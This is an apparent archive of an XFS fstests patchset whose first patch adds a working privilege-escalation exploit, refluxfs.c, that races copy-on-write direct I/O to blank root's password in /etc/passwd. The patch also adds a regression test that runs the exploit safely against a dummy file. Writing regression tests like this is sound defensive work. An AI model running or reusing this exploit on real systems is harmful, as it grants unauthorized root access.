Linux XFS filesystem development
 help / color / mirror / Atom feed
* [PATCHSET] fstests: new tests for old features
@ 2026-09-28 15:36 Darrick J. Wong
  2026-09-28 15:36 ` [PATCH 1/4] generic: regression test for refluxfs fixes Darrick J. Wong
                   ` (3 more replies)
  0 siblings, 4 replies; 11+ messages in thread
From: Darrick J. Wong @ 2026-09-28 15:36 UTC (permalink / raw)
  To: zlang, djwong; +Cc: hch, qsa, aalbersh, linux-xfs, fstests

Hi all,

Here are some new tests for old features.

If you're going to start using this code, I strongly recommend pulling
from my git trees, which are linked below.

With a bit of luck, this should all go splendidly.
Comments and questions are, as always, welcome.

--D

fstests git tree:
https://git.kernel.org/cgit/linux/kernel/git/djwong/xfstests-dev.git/log/?h=new-tests
---
Commits in this patchset:
 * generic: regression test for refluxfs fixes
 * common/xfs: add zoned/rtstart info to mkfs filter output
 * xfs: basic functional testing of media verification command
 * xfs: test mkfs.xfs config file generation
---
 .gitignore             |    1 
 common/xfs             |    3 
 src/Makefile           |    2 
 src/refluxfs.c         |  435 ++++++++++++++++++++++++++++++++++++++++++++++++
 tests/generic/1956     |   58 ++++++
 tests/generic/1956.out |    2 
 tests/xfs/1908         |  123 ++++++++++++++
 tests/xfs/1908.out     |   28 +++
 tests/xfs/1909         |  163 ++++++++++++++++++
 tests/xfs/1909.out     |    2 
 10 files changed, 816 insertions(+), 1 deletion(-)
 create mode 100644 src/refluxfs.c
 create mode 100755 tests/generic/1956
 create mode 100644 tests/generic/1956.out
 create mode 100755 tests/xfs/1908
 create mode 100644 tests/xfs/1908.out
 create mode 100755 tests/xfs/1909
 create mode 100644 tests/xfs/1909.out


^ permalink raw reply	[flat|nested] 11+ messages in thread

* [PATCH 1/4] generic: regression test for refluxfs fixes
  2026-09-28 15:36 [PATCHSET] fstests: new tests for old features Darrick J. Wong
@ 2026-09-28 15:36 ` Darrick J. Wong
  2026-10-08 14:45   ` Zorro Lang
  2026-09-28 15:36 ` [PATCH 2/4] common/xfs: add zoned/rtstart info to mkfs filter output Darrick J. Wong
                   ` (2 subsequent siblings)
  3 siblings, 1 reply; 11+ messages in thread
From: Darrick J. Wong @ 2026-09-28 15:36 UTC (permalink / raw)
  To: zlang, djwong; +Cc: hch, qsa, linux-xfs, fstests

From: Darrick J. Wong <djwong@kernel.org>

Regression test for refluxfs as found by Qualys.

Reported-by: qsa@qualys.com
Co-developed-by: qsa@qualys.com
Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>
Reviewed-by: Christoph Hellwig <hch@lst.de>
---
 .gitignore             |    1 
 src/Makefile           |    2 
 src/refluxfs.c         |  435 ++++++++++++++++++++++++++++++++++++++++++++++++
 tests/generic/1956     |   58 ++++++
 tests/generic/1956.out |    2 
 5 files changed, 497 insertions(+), 1 deletion(-)
 create mode 100644 src/refluxfs.c
 create mode 100755 tests/generic/1956
 create mode 100644 tests/generic/1956.out


diff --git a/.gitignore b/.gitignore
index d52ba4ad30852b..b5d85c9451f0a8 100644
--- a/.gitignore
+++ b/.gitignore
@@ -126,6 +126,7 @@ tags
 /src/pwrite_mmap_blocked
 /src/randholes
 /src/readdir-while-renames
+/src/refluxfs
 /src/rename
 /src/renameat2
 /src/resvtest
diff --git a/src/Makefile b/src/Makefile
index 0ff607ae15930d..04a73b76546241 100644
--- a/src/Makefile
+++ b/src/Makefile
@@ -36,7 +36,7 @@ LINUX_TARGETS = xfsctl bstat t_mtab getdevicesize preallo_rw_pattern_reader \
 	fscrypt-crypt-util bulkstat_null_ocount splice-test chprojid_fail \
 	detached_mounts_propagation ext4_resize t_readdir_3 splice2pipe \
 	uuid_ioctl t_snapshot_deleted_subvolume fiemap-fault min_dio_alignment \
-	rw_hint btrfs_ioctl
+	rw_hint btrfs_ioctl refluxfs
 
 EXTRA_EXECS = dmerror fill2attr fill2fs fill2fs_check scaleread.sh \
 	      btrfs_crc32c_forged_name.py popdir.pl popattr.py \
diff --git a/src/refluxfs.c b/src/refluxfs.c
new file mode 100644
index 00000000000000..f2d4402a940a80
--- /dev/null
+++ b/src/refluxfs.c
@@ -0,0 +1,435 @@
+/* refluxfs.c -- RefluXFS PoC (CVE-2026-XXXXX)
+ *
+ * This PoC targets /etc/passwd (always world-readable, arch-independent, easy
+ * to verify and revert).  It never opens the target for write; the corrupting
+ * DIO is issued against the attacker-owned CLONE, whose stale imap points at
+ * the target's block.  Before racing, it saves a full BYTE-COPY backup of the
+ * target (read/write -- never reflink, so it takes no refcount on the block).
+ * On success it leaves /etc/passwd modified so you can `su` (empty password),
+ * confirm uid=0, and restore from the backup.
+ *
+ * Build:  cc -O2 -pthread -o refluxfs refluxfs.c
+ * Run:    ./refluxfs                 # zero-arg defaults; safe to Ctrl-C
+ *
+ * Exit:   0  vulnerable (race fired; target left modified, backup saved)
+ *         1  precondition unmet, or runtime error (with a specific reason)
+ *         2  race did not fire (budget exhausted or interrupted)
+ */
+#ifndef _GNU_SOURCE
+#define _GNU_SOURCE
+#endif
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <errno.h>
+#include <signal.h>
+#include <stdarg.h>
+#include <stdint.h>
+#include <time.h>
+#include <sys/ioctl.h>
+#include <sys/utsname.h>
+#include <sys/stat.h>
+#include <sys/vfs.h>
+#include <linux/fs.h>
+#include <linux/magic.h>
+#include <linux/fiemap.h>
+#include <stdatomic.h>
+
+#ifndef FICLONE
+#define FICLONE _IOW(0x94, 9, int)
+#endif
+
+/* original PoC assumed 4k fsblocks, but use 64k to cover more fs geometries */
+#define BLK 65536
+
+/* ---- configuration (overridable via CLI) --------------------------------- */
+static const char *target_path   = "/etc/passwd";
+static const char *clone_dir     = "/var/tmp";
+static int         nr_writers    = 32;
+static int         nr_pressure   = 8;
+static int         budget_s      = 300;
+
+/* ---- state --------------------------------------------------------------- */
+static char  workdir[512], clone_path[600], backup_path[600];
+static int   target_fd_ro = -1;
+static unsigned char golden[BLK];        /* first block of target, verbatim   */
+static ssize_t golden_len;               /* == min(i_size, BLK)               */
+static unsigned char *dio_buf;           /* BLK-aligned; every writer pwrites */
+static int   keep_backup;                /* set on success; gates atexit()    */
+static atomic_int  sigint;               /* set by handler; read only by main */
+static atomic_int  stop;                 /* set by main; read by threads      */
+static long  rounds;
+static pthread_barrier_t bar;
+
+/* ---- helpers ------------------------------------------------------------- */
+__attribute__((format(printf, 2, 3)))
+static void say(const char *tag, const char *fmt, ...)
+{
+    va_list ap; va_start(ap, fmt);
+    fprintf(stderr, "[%s] ", tag);
+    vfprintf(stderr, fmt, ap);
+    fprintf(stderr, "\n");
+    va_end(ap);
+}
+#define OK(...)   say("+", __VA_ARGS__)
+#define BAD(...)  say("!", __VA_ARGS__)
+#define INFO(...) say("*", __VA_ARGS__)
+
+static void die(int code, const char *why, const char *hint)
+{
+    BAD("%s: %s", why, strerror(errno));
+    if (hint) INFO("%s", hint);
+    exit(code);
+}
+
+static void on_signal(int sig)
+{
+    (void)sig;
+    atomic_store(&sigint, 1);
+}
+
+/* Registered with atexit() as soon as workdir exists; runs on every exit
+ * path (die(), preflight refusal, timeout, success).  Always removes clone
+ * and pressure files; removes backup + workdir unless the run succeeded. */
+static void cleanup(void)
+{
+    unlink(clone_path);
+    for (int i = 0; i < nr_pressure; i++) {
+        char p[600]; snprintf(p, sizeof p, "%s/press.%d", workdir, i); unlink(p);
+    }
+    if (!keep_backup) {
+        unlink(backup_path);
+        rmdir(workdir);
+    }
+}
+
+/* ---- preflight ----------------------------------------------------------- */
+
+static int same_fs(const char *a, const char *b)
+{
+    struct stat sa, sb;
+    if (stat(a, &sa) || stat(b, &sb)) return -1;
+    return sa.st_dev == sb.st_dev;
+}
+
+/* FIEMAP: is the target's first extent already shared (refcount > 1)?
+ * If so the race can never see refcount==1. */
+static int target_first_extent_shared(void)
+{
+    union {
+        struct fiemap fm;
+        char raw[sizeof(struct fiemap) + sizeof(struct fiemap_extent)];
+    } q;
+    memset(&q, 0, sizeof q);
+    q.fm.fm_length = BLK;
+    q.fm.fm_flags = FIEMAP_FLAG_SYNC;
+    q.fm.fm_extent_count = 1;
+    if (ioctl(target_fd_ro, FS_IOC_FIEMAP, &q) < 0) return -1; /* unknown */
+    if (q.fm.fm_mapped_extents < 1) return -1;
+    return (q.fm.fm_extents[0].fe_flags & FIEMAP_EXTENT_SHARED) ? 1 : 0;
+}
+
+static void preflight(void)
+{
+    struct stat st;
+
+    /* 1. target readable */
+    target_fd_ro = open(target_path, O_RDONLY);
+    if (target_fd_ro < 0)
+        die(1, "open target O_RDONLY",
+            "Target must be world-readable. /etc/passwd is on every distro.");
+    if (fstat(target_fd_ro, &st)) die(1, "fstat target", NULL);
+    golden_len = pread(target_fd_ro, golden, BLK, 0);
+    if (golden_len < 0) die(1, "read target", NULL);
+    OK("target %s: readable, %lld bytes (using first %zd)",
+       target_path, (long long)st.st_size, golden_len);
+    if (st.st_blksize != BLK)
+        INFO("note: st_blksize=%ld != %d -- this PoC assumes 4K fs blocks "
+             "and may false-negative otherwise.", (long)st.st_blksize, BLK);
+
+    /* We only assume line 1 is `root:x:...` -- universal on shadow-using Linux.
+     * `root::...` means a previous run already emptied the password field. */
+    if (golden_len >= 6 && !memcmp(golden, "root::", 6)) {
+        BAD("target line 1 already has an empty password field (root::).");
+        INFO("A previous run left it modified. Restore first (as root, or `su`):");
+        INFO("    dd if=%s/.refluxfs-%d-PID/target.orig of=%s",
+             clone_dir, (int)getuid(), target_path);
+        INFO("(ls -d %s/.refluxfs-%d-*  to find the right PID directory;",
+             clone_dir, (int)getuid());
+        INFO(" use dd -- cp, and recent coreutils cat, may reflink.)");
+        exit(1);
+    }
+    if (golden_len < 8 || memcmp(golden, "root:x:", 7) ||
+        !memchr(golden, '\n', golden_len)) {
+        BAD("target line 1 is not \"root:x:...\\n\" -- unexpected format.");
+        INFO("This PoC's payload assumes the standard shadow-backed root entry.");
+        INFO("Use -t to point at a different target or adjust the payload.");
+        exit(1);
+    }
+
+    /* 3. clone_dir on the same superblock */
+    if (access(clone_dir, W_OK)) die(1, "clone dir not writable",
+        "Need a writable directory on the SAME XFS filesystem as the target.");
+    int s = same_fs(target_path, clone_dir);
+    if (s < 0) die(1, "stat clone dir", NULL);
+    if (!s) {
+        BAD("clone dir %s is NOT on the same filesystem as %s (st_dev differs).",
+            clone_dir, target_path);
+        INFO("FICLONE returns -EXDEV across superblocks. Use -d with a writable");
+        INFO("directory on the target's mount (findmnt -T %s).", target_path);
+        exit(1);
+    }
+    OK("clone dir %s: writable, same st_dev as target", clone_dir);
+
+    /* 4. workdir */
+    snprintf(workdir, sizeof workdir, "%s/.refluxfs-%d-%d",
+             clone_dir, (int)getuid(), (int)getpid());
+    if (mkdir(workdir, 0700) && errno != EEXIST)
+        die(1, "mkdir workdir", NULL);
+    snprintf(clone_path,  sizeof clone_path,  "%s/clone",       workdir);
+    snprintf(backup_path, sizeof backup_path, "%s/target.orig", workdir);
+    atexit(cleanup);           /* every exit() from here on cleans workdir */
+
+    /* Full BYTE-COPY backup of target (read/write, never FICLONE/
+     * copy_file_range -- must not take a refcount on the target's block). */
+    {
+        int bfd = open(backup_path, O_WRONLY|O_CREAT|O_TRUNC, 0600);
+        if (bfd < 0) die(1, "open backup", NULL);
+        unsigned char buf[8192]; ssize_t n; off_t off = 0;
+        while ((n = pread(target_fd_ro, buf, sizeof buf, off)) > 0) {
+            if (write(bfd, buf, n) != n) die(1, "write backup", NULL);
+            off += n;
+        }
+        if (n < 0) die(1, "read target for backup", NULL);
+        fsync(bfd); close(bfd);
+        OK("workdir %s", workdir);
+        OK("backup  %s  (%lld bytes, byte-copy -- no reflink taken)",
+           backup_path, (long long)off);
+    }
+
+    /* 5. abort if target's first extent is already shared (checked BEFORE we
+     *    FICLONE ourselves and create a share). */
+    int sh = target_first_extent_shared();
+    if (sh == 1) {
+        BAD("target's first extent is ALREADY SHARED (FIEMAP_EXTENT_SHARED).");
+        INFO("The race needs refcount(X) to drop to exactly 1; a pre-existing");
+        INFO("reflink (e.g. `cp --reflink=auto` backup, coreutils >= 9.0 default)");
+        INFO("keeps it >= 2 and the race can never fire. Reset primitive:");
+        INFO("    chsh -s /usr/bin/bash");
+        INFO("    (or `-s /bin/bash` if that says 'Shell not changed.'; on");
+        INFO("     RHEL-family, chsh is in the optional util-linux-user pkg)");
+        INFO("This rewrites /etc/passwd via rename(2) as a fresh unshared inode.");
+        exit(1);
+    } else if (sh == 0) {
+        OK("target's first extent is not pre-shared (refcount==1)");
+    } else {
+        INFO("cannot determine sharing state via FIEMAP -- proceeding.");
+    }
+
+    /* 6. FICLONE actually works (=> reflink=1) */
+    int c = open(clone_path, O_RDWR|O_CREAT|O_TRUNC, 0600);
+    if (c < 0) die(1, "open clone", NULL);
+    if (ioctl(c, FICLONE, target_fd_ro) < 0) {
+        int e = errno;
+        BAD("FICLONE(clone <- target) failed: %s", strerror(e));
+        if (e == EOPNOTSUPP)
+            INFO("This XFS was made with reflink=0 (xfsprogs < 5.1.0 or explicit).");
+        else if (e == EXDEV)
+            INFO("Different filesystem after all -- pick another -d directory.");
+        close(c);
+        exit(1);
+    }
+    close(c);
+    OK("FICLONE works -- filesystem has reflink=1");
+
+    /* 7. O_DIRECT open + one aligned pwrite actually work.  All writers share
+     *    this one buffer -- payload never changes and pwrite() only reads it. */
+    if ((errno = posix_memalign((void **)&dio_buf, BLK, BLK)))
+        die(1, "posix_memalign", NULL);
+    memset(dio_buf, 0, BLK);
+    c = open(clone_path, O_RDWR|O_DIRECT);
+    if (c < 0) die(1, "open clone O_DIRECT",
+                "O_DIRECT is required to reach xfs_direct_write_iomap_begin().");
+    if (pwrite(c, dio_buf, BLK, 0) != BLK)
+        die(1, "O_DIRECT pwrite (alignment?)",
+            "This PoC assumes 4K DIO alignment (default on all target distros).");
+    close(c);
+    OK("O_DIRECT open + %d-byte aligned pwrite work on clone", BLK);
+}
+
+/* ---- race machinery ------------------------------------------------------ */
+
+static int reclone(void)
+{
+    int c = open(clone_path, O_RDWR|O_CREAT|O_TRUNC, 0600);
+    if (c < 0) return -errno;
+    int r = ioctl(c, FICLONE, target_fd_ro) < 0 ? -errno : 0;
+    close(c);
+    return r;
+}
+
+static int target_changed(void)
+{
+    unsigned char b[BLK] = {0};
+    /* DIO landed on disk under a different address_space; drop the target's
+     * (stale, clean) cached page so we re-read from disk. */
+    posix_fadvise(target_fd_ro, 0, 0, POSIX_FADV_DONTNEED);
+    ssize_t n = pread(target_fd_ro, b, golden_len, 0);
+    return n == golden_len && memcmp(b, golden, golden_len) != 0;
+}
+
+static void *writer(void *arg)
+{
+    (void)arg;
+    for (;;) {
+        pthread_barrier_wait(&bar);          /* start of round */
+        if (atomic_load(&stop)) break;       /* set only by main, only when
+                                              * every writer is parked here */
+        int fd = open(clone_path, O_RDWR|O_DIRECT);
+        if (fd >= 0) { (void)!pwrite(fd, dio_buf, BLK, 0); close(fd); }
+        pthread_barrier_wait(&bar);          /* end of round */
+    }
+    return NULL;
+}
+
+static void *pressure(void *arg)
+{
+    char p[600];
+    snprintf(p, sizeof p, "%s/press.%d", workdir, (int)(intptr_t)arg);
+    int fd = open(p, O_RDWR|O_CREAT|O_TRUNC, 0600);
+    if (fd < 0) return NULL;
+    char b = 0;
+    while (!atomic_load(&stop)) {
+        /* return values irrelevant -- goal is XFS log traffic, not the data */
+        (void)!pwrite(fd, &b, 1, 0);
+        (void)!ftruncate(fd, BLK);
+        fdatasync(fd);
+        (void)!ftruncate(fd, 0);
+    }
+    close(fd);
+    return NULL;
+}
+
+/* ---- main ---------------------------------------------------------------- */
+
+static void usage(const char *argv0)
+{
+    fprintf(stderr,
+      "usage: %s [-t target] [-d clone-dir] [-s seconds] [-w writers] [-p pressure]\n"
+      "  -t  target file            (default /etc/passwd; line 1 must be root:x:...)\n"
+      "  -d  clone/work directory   (default /var/tmp; must be writable, same XFS as -t)\n"
+      "  -s  budget in seconds      (default 300)\n"
+      "  -w  concurrent DIO writers (default 32)\n"
+      "  -p  log-pressure threads   (default 8)\n",
+      argv0);
+}
+
+int main(int argc, char **argv)
+{
+    int opt;
+    while ((opt = getopt(argc, argv, "t:d:s:w:p:h")) != -1) switch (opt) {
+        case 't': target_path = optarg; break;
+        case 'd': clone_dir   = optarg; break;
+        case 's': budget_s    = atoi(optarg); if (budget_s    < 1) budget_s    = 1; break;
+        case 'w': nr_writers  = atoi(optarg); if (nr_writers  < 2) nr_writers  = 2; break;
+        case 'p': nr_pressure = atoi(optarg); if (nr_pressure < 0) nr_pressure = 0; break;
+        default:  usage(argv[0]); return 1;
+    }
+
+    struct utsname un;
+    uname(&un);
+    INFO("RefluXFS PoC -- kernel %s", un.release);
+
+    /* Install handlers BEFORE preflight so Ctrl-C after workdir/clone creation
+     * still reaches atexit(cleanup) instead of leaving a reflinked clone (which
+     * would keep the target's extent SHARED and defeat every later run). */
+    signal(SIGINT,  on_signal);
+    signal(SIGTERM, on_signal);
+
+    preflight();
+
+    /* Payload: surgical edit of line 1 only.  `root:x:...\n` -> `root::...\n\n`.
+     * Shift the byte range [6, nl] one position left over the `x`; the
+     * original `\n` at position nl is untouched, so we get two consecutive
+     * newlines and every byte from line 2 onward stays at its ORIGINAL
+     * offset -- correct for any file size, no entry straddles a boundary. */
+    memcpy(dio_buf, golden, golden_len);
+    ssize_t nl = 0;
+    while (nl < golden_len && golden[nl] != '\n') nl++;
+    memmove(dio_buf + 5, dio_buf + 6, (size_t)nl - 5);   /* nl>=7 by preflight */
+
+    /* threads */
+    if ((errno = pthread_barrier_init(&bar, NULL, nr_writers + 1)))
+        die(1, "pthread_barrier_init", NULL);
+    pthread_t *tw = calloc(nr_writers,  sizeof *tw);
+    pthread_t *tp = calloc(nr_pressure ? nr_pressure : 1, sizeof *tp);
+    if (!tw || !tp) { BAD("calloc: out of memory"); exit(1); }
+    for (int i = 0; i < nr_writers;  i++)
+        if ((errno = pthread_create(&tw[i], NULL, writer, NULL)))
+            die(1, "pthread_create writer", NULL);
+    for (int i = 0; i < nr_pressure; i++)
+        if ((errno = pthread_create(&tp[i], NULL, pressure, (void*)(intptr_t)i)))
+            die(1, "pthread_create pressure", NULL);
+
+    /* Race: reclone -> release all writers -> check target -> repeat. */
+    INFO("racing: %d writers + %d log-pressure threads, up to %ds ...",
+         nr_writers, nr_pressure, budget_s);
+    struct timespec t0, t; clock_gettime(CLOCK_MONOTONIC, &t0);
+    int rc = 2, e;
+    while (!atomic_load(&sigint)) {
+        if ((e = reclone()) < 0) {
+            fprintf(stderr, "\n");
+            BAD("reclone: %s", strerror(-e));
+            rc = 1; break;
+        }
+        rounds++;
+        pthread_barrier_wait(&bar);          /* release writers */
+        pthread_barrier_wait(&bar);          /* writers done   */
+        if (target_changed()) { rc = 0; break; }
+        clock_gettime(CLOCK_MONOTONIC, &t);
+        long el = t.tv_sec - t0.tv_sec;
+        if (el >= budget_s) break;
+        if ((rounds & 0xff) == 0)
+            fprintf(stderr, "\r    round %ld  (%lds, ~%ld r/s)   ",
+                    rounds, el, el ? rounds/el : rounds);
+    }
+    fprintf(stderr, "\n");
+
+    /* Shutdown. Every path out of the loop above leaves each writer either
+     * already at (or on its way to) the start-barrier -- the loop never breaks
+     * between the two barrier_wait()s, and writers only test `stop`, which is
+     * still 0.  Set `stop` now, cross the start-barrier once to release them;
+     * they observe `stop` immediately after and exit without a second wait. */
+    atomic_store(&stop, 1);
+    pthread_barrier_wait(&bar);
+    for (int i = 0; i < nr_writers;  i++) pthread_join(tw[i], NULL);
+    for (int i = 0; i < nr_pressure; i++) pthread_join(tp[i], NULL);
+    free(tw); free(tp);
+
+    if (rc == 0) {
+        keep_backup = 1;       /* atexit(cleanup) leaves backup + workdir */
+        char now[96] = {0};
+        if (pread(target_fd_ro, now, sizeof now - 1, 0) > 0)
+            for (char *q = now; *q; q++) if (*q == '\n') { *q = 0; break; }
+        BAD("=========================================================");
+        BAD("VULNERABLE -- %s block 0 overwritten via stale-imap DIO", target_path);
+        BAD("first line is now:  %s", now);
+        BAD("hit at round %ld", rounds);
+        BAD("=========================================================");
+        fprintf(stderr, "\n");
+        INFO("Confirm:  su                 (empty password -> `id` shows uid=0)");
+        INFO("Restore:  # dd if=%s of=%s", backup_path, target_path);
+        INFO("          (as root; dd is read/write. Do NOT use cp or cat: cp");
+        INFO("           reflinks via FICLONE by default (>=9.0), and recent");
+        INFO("           coreutils cat uses copy_file_range() which also");
+        INFO("           reflinks -- either would leave the target SHARED.)");
+    } else if (rc == 2) {
+        OK("race did not fire in %ld rounds.", rounds);
+        if (!atomic_load(&sigint))
+            INFO("Kernel is likely PATCHED (or window too tight -- retry with larger -s / -w).");
+    }
+    return rc;
+}
diff --git a/tests/generic/1956 b/tests/generic/1956
new file mode 100755
index 00000000000000..bc926e4685408e
--- /dev/null
+++ b/tests/generic/1956
@@ -0,0 +1,58 @@
+#! /bin/bash
+# SPDX-License-Identifier: GPL-2.0
+# Copyright (c) 2026 Oracle.  All Rights Reserved.
+#
+# FS QA Test No. 1956
+#
+# Regression test for refluxfs, which is an exploit for a race condition in
+# XFS' directio copy-on-write code that can be used to rewrite shared blocks
+# to gain root privileges.
+#
+. ./common/preamble
+_begin_fstest auto rw clone
+
+_cleanup()
+{
+	cd /
+	rm -r -f $tmp.*
+	test -n "$dummydir" && rm -r -f "$dummydir"
+}
+
+. ./common/reflink
+
+_require_test_program "refluxfs"
+_require_test_reflink
+_require_odirect
+_require_user fsgqa
+_require_group fsgqa
+
+_fixed_by_fs_commit xfs 2f4acd0fcd862e \
+	"xfs: resample the data fork mapping after cycling ILOCK"
+
+dummydir="$TEST_DIR/$seq"
+
+rm -r -f "$dummydir"
+mkdir "$dummydir"
+
+fakedata="root:x:0:0:root:/root:/bin/bash"
+echo "$fakedata" > $dummydir/datafile
+
+# Try to trick the system into letting a different user make a reflink copy of
+# the data file and rewrite the shared data block to corrupt the contents.
+mkdir $dummydir/workdir
+chown $qa_user:$qa_group $dummydir/workdir
+_su $qa_user -c "$here/src/refluxfs -t $dummydir/datafile -d $dummydir/workdir -s $((30 * TIME_FACTOR))" &>> $seqres.full
+res=$?
+case "$res" in
+0)	echo "vulnerable to corruption";;
+1)	echo "runtime error";;
+2)	echo "corruption not observed";;
+*)	echo "unknown outcome $res";;
+esac
+
+result="$(cat $dummydir/datafile)"
+test "$result" != "$fakedata" && \
+	echo "shared data block rewritten, you have been pwned!"
+
+# success, all done
+_exit 0
diff --git a/tests/generic/1956.out b/tests/generic/1956.out
new file mode 100644
index 00000000000000..55d8be979b1486
--- /dev/null
+++ b/tests/generic/1956.out
@@ -0,0 +1,2 @@
+QA output created by 1956
+corruption not observed


^ permalink raw reply related	[flat|nested] 11+ messages in thread

* [PATCH 2/4] common/xfs: add zoned/rtstart info to mkfs filter output
  2026-09-28 15:36 [PATCHSET] fstests: new tests for old features Darrick J. Wong
  2026-09-28 15:36 ` [PATCH 1/4] generic: regression test for refluxfs fixes Darrick J. Wong
@ 2026-09-28 15:36 ` Darrick J. Wong
  2026-10-01 12:27   ` Andrey Albershteyn
                     ` (2 more replies)
  2026-09-28 15:36 ` [PATCH 3/4] xfs: basic functional testing of media verification command Darrick J. Wong
  2026-09-28 15:36 ` [PATCH 4/4] xfs: test mkfs.xfs config file generation Darrick J. Wong
  3 siblings, 3 replies; 11+ messages in thread
From: Darrick J. Wong @ 2026-09-28 15:36 UTC (permalink / raw)
  To: zlang, djwong; +Cc: linux-xfs, fstests

From: Darrick J. Wong <djwong@kernel.org>

A subsequent patch will want to be able to extract the start of an
internal rt volume from the xfs_info output, so add the necessary lines
to _xfs_filter_mkfs to transform the output into bash variables.

Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>
---
 common/xfs |    3 +++
 1 file changed, 3 insertions(+)


diff --git a/common/xfs b/common/xfs
index 98981e624ddade..318b1a3b245ae6 100644
--- a/common/xfs
+++ b/common/xfs
@@ -1787,6 +1787,9 @@ _xfs_filter_mkfs()
 	}
 	if (/^\s+=\s+rgcount=(\d+)\s+rgsize=(\d+) extents/) {
 		print STDERR "rgcount=$1\nrgextents=$2\n";
+	}
+	if (/^\s+=\s+zoned=(\d+)\s+start=(\d+) reserved=(\d+)/) {
+		print STDERR "zoned=$1\nrtstart=$2\nrtreserved=$3\n";
 	}'
 }
 


^ permalink raw reply related	[flat|nested] 11+ messages in thread

* [PATCH 3/4] xfs: basic functional testing of media verification command
  2026-09-28 15:36 [PATCHSET] fstests: new tests for old features Darrick J. Wong
  2026-09-28 15:36 ` [PATCH 1/4] generic: regression test for refluxfs fixes Darrick J. Wong
  2026-09-28 15:36 ` [PATCH 2/4] common/xfs: add zoned/rtstart info to mkfs filter output Darrick J. Wong
@ 2026-09-28 15:36 ` Darrick J. Wong
  2026-10-01 12:44   ` Andrey Albershteyn
  2026-10-05 12:57   ` Christoph Hellwig
  2026-09-28 15:36 ` [PATCH 4/4] xfs: test mkfs.xfs config file generation Darrick J. Wong
  3 siblings, 2 replies; 11+ messages in thread
From: Darrick J. Wong @ 2026-09-28 15:36 UTC (permalink / raw)
  To: zlang, djwong; +Cc: linux-xfs, fstests

From: Darrick J. Wong <djwong@kernel.org>

Implement a simple testcase to check that media verification works on
however the scratch filesystem is configured.

Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>
---
 tests/xfs/1908     |  123 ++++++++++++++++++++++++++++++++++++++++++++++++++++
 tests/xfs/1908.out |   28 ++++++++++++
 2 files changed, 151 insertions(+)
 create mode 100755 tests/xfs/1908
 create mode 100644 tests/xfs/1908.out


diff --git a/tests/xfs/1908 b/tests/xfs/1908
new file mode 100755
index 00000000000000..93a87293adbcef
--- /dev/null
+++ b/tests/xfs/1908
@@ -0,0 +1,123 @@
+#! /bin/bash
+# SPDX-License-Identifier: GPL-2.0
+# Copyright (c) 2026 Oracle.  All Rights Reserved.
+#
+# FS QA Test 1908
+#
+# Basic functional testing of the verifymedia command.
+#
+. ./common/preamble
+_begin_fstest auto quick scrub selfhealing
+
+. ./common/filter
+
+_require_xfs_io_command verifymedia
+_require_scratch
+
+# Make the data and rt volumes small enough that this won't take forever
+# on large slow devices.
+_scratch_mkfs_sized $((600 * 1024 * 1024)) | \
+	_filter_mkfs 2>$tmp.mkfs >> $seqres.full
+_scratch_mount
+
+. $tmp.mkfs
+
+filter_verifymedia() {
+	grep '^verified' | \
+		tr '/' ' ' | \
+		awk '{printf("VERIFIED=%s WANTED=%s OFFSET=%s\n", $2, $3, $7);}'
+}
+
+testme() {
+	unset VERIFIED
+	unset WANTED
+	unset OFFSET
+
+	local x
+	x=$($XFS_IO_PROG -c "verifymedia $*" $SCRATCH_MNT | filter_verifymedia)
+	eval "$x"
+}
+
+cat $tmp.mkfs >> $seqres.full
+
+DDEV_EOD=$((dblocks * dbsize)) # bytes
+
+# t0: no parameters, which means the whole data device
+testme
+_within_tolerance "t0 wanted range" $WANTED $DDEV_EOD 2% -v
+_within_tolerance "t0 verified range" $VERIFIED $WANTED 2% -v
+_within_tolerance "t0 offset" $OFFSET 0 0 -v
+
+# t1: data device
+testme -d
+_within_tolerance "t1 wanted range" $WANTED $DDEV_EOD 2% -v
+_within_tolerance "t1 verified range" $VERIFIED $WANTED 2% -v
+_within_tolerance "t1 offset" $OFFSET 0 0 -v
+
+# t2: realtime volume
+if [ $rtblocks -gt 0 ]; then
+	testme -r
+	if [ -n "$rtstart" ]; then
+		rtend=$((rtstart + rtblocks))
+	else
+		rtend=$rtblocks
+	fi
+	_within_tolerance "t2 wanted range" $WANTED $((rtend * dbsize)) 2% -v
+	_within_tolerance "t2 verified range" $VERIFIED $WANTED 2% -v
+	_within_tolerance "t2 offset" $OFFSET 0 0 -v
+else
+	cat << ENDL
+t2 wanted range is in range
+t2 verified range is in range
+t2 offset is in range
+ENDL
+fi
+
+# t3: external log volume
+if [ "$ldev" != "internal log" ]; then
+	testme -l
+	_within_tolerance "t3 wanted range" $WANTED $((lblocks * dbsize)) 2% -v
+	_within_tolerance "t3 verified range" $VERIFIED $WANTED 2% -v
+	_within_tolerance "t3 offset" $OFFSET 0 0 -v
+else
+	cat << ENDL
+t3 wanted range is in range
+t3 verified range is in range
+t3 offset is in range
+ENDL
+fi
+
+# t4: start of data device
+testme -d 0m 10m
+_within_tolerance "t4 wanted range" $WANTED $((10 * 1024 * 1024)) 2% -v
+_within_tolerance "t4 verified range" $VERIFIED $WANTED 2% -v
+_within_tolerance "t4 offset" $OFFSET 0 0 -v
+
+# t5: middle of data device
+testme -d 257m 281m
+_within_tolerance "t5 wanted range" $WANTED $((24 * 1024 * 1024)) 2% -v
+_within_tolerance "t5 verified range" $VERIFIED $WANTED 2% -v
+_within_tolerance "t5 offset" $OFFSET $((257 * 1024 * 1024)) 2% -v
+
+# t6: end of data device
+t6_offset=$((DDEV_EOD - (11 * 1024 * 1024)))
+testme -d $t6_offset $DDEV_EOD
+_within_tolerance "t6 wanted range" $WANTED $((11 * 1024 * 1024)) 2% -v
+_within_tolerance "t6 verified range" $VERIFIED $WANTED 2% -v
+_within_tolerance "t6 offset" $OFFSET $t6_offset 2% -v
+
+# t7: start after end
+testme -d 241m 217m
+_within_tolerance "t7 wanted range" $WANTED 0 0 -v
+_within_tolerance "t7 verified range" $VERIFIED $WANTED 2% -v
+_within_tolerance "t7 offset" $OFFSET $((241 * 1024 * 1024)) 2% -v
+
+# t8: range crosses eod
+t8_offset=$((DDEV_EOD - (3 * 1024 * 1024)))
+t8_end=$((DDEV_EOD + (70 * 1024 * 1024)))
+testme -d $t8_offset $t8_end
+_within_tolerance "t8 wanted range" $WANTED $((3 * 1024 * 1024)) 2% -v
+_within_tolerance "t8 verified range" $VERIFIED $WANTED 2% -v
